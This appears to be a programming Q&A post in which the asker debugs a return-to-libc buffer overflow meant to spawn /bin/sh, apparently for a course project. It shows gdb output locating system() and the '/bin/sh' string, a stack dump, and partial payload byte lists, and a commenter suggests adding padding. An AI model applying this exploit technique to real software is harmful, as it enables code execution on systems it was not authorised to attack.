# Buffer Overflow to /bin/sh

Tags: c, buffer-overflow

I am trying to do a buffer overflow for a project. The buffer needs to overflow to /bin/sh. I have found the correct return address, but I do not seem to be successfully getting an overflow.

```
Program received signal SIGSEGV, Segmentation fault.
0xb7fbc544 in msg (params) at myfile.c:167
167     msg_length = ctx->backend->send_msg_pre(msg, msg_length);
(gdb) backtrace
#0  0xb7fbc544 in msg (params) at myfile.c:167
#1  0xb7fbc869 in my_function(params) at myfile.c:912
#2  0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
```

To find the /bin/sh I followed [this post](https://stackoverflow.com/questions/19124095/return-to-lib-c-buffer-overflow-exercise-issue):

```
(gdb) print &system
$15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system>
(gdb) find &system,+9999999,"/bin/sh"
0xb7f6ca24
warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search.
1 pattern found.
(gdb)
```

I have found the return address and verified it is correct (if I replace it with a different function it calls that function). The original return address is bolded

0xbffff690: 0x90909090  0x90909090  0x90909090  ***0xb7e4c190***

0xbffff6a0: 0xb7f6ca24  0x0804c050  0x0000004d  0x0804c158

The payload I sent was *0xb7e4c190 0xb7f6ca24 50*

This overflow is a bit more tricky than others, because I need to do some padding to it in the front and the back. The way the item I am overflowing works is that it sets 6 bytes, so each set will take up a portion of one address and another.

I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:

```
payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']
```

**Is there something I am missing here?** Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.

Comment: I think you need a 4 bytes padding in your payload between `system` and `/bin/sh`

Comment: I tried that but it did not seem to work either 

`payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
payload = payload + ['\x90'] + ['\x90'] + ['\x90'] + ['\x90']
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7']`